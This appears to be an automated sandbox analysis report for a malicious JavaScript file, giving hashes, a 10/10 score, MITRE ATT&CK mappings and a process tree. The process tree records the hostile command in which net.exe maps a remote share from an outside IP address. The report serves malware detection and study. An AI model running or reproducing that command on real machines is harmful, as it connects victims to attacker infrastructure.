4ff60df7d165862e652f73752eb98cf92202a2d748b055ff1f99d4172fa4c92f

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
submitted
07/03/2024, 22:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Doc_a33_48r689650-09e10356r7053-5176t8.js
Size

741KB
MD5

7d42412a93368417fed25f581c536e5a
SHA1

fc3fb6a8ea56b44ad0523ed51b2a3f1eb0a48ea5
SHA256

4ff60df7d165862e652f73752eb98cf92202a2d748b055ff1f99d4172fa4c92f
SHA512

a23d74f77e5f57016b2018dd7a2012b017cc7edf85f4bfa9815abef0cfb23d635eb81bc30b0428e29787afc20cb1f43c9a1c2c9056644d3d07491f9e20983bb9
SSDEEP

12288:K3t6VphwszJa6nOvEHcYYDLfoigw9lfFUFEbTFty:K3ALhwszJuEHUDLwiPlf+FwTXy

Score

10^/10

discovery execution

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3696	4036	net.exe	89

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Doc_a33_48r689650-09e10356r7053-5176t8.js
1⤵
PID:3440

C:\Windows\system32\net.exe
net use A: \\95.164.3.171@80\share\ /persistent:no
1⤵
- Process spawned unexpected child process
PID:3696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Share Discovery

T1135

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...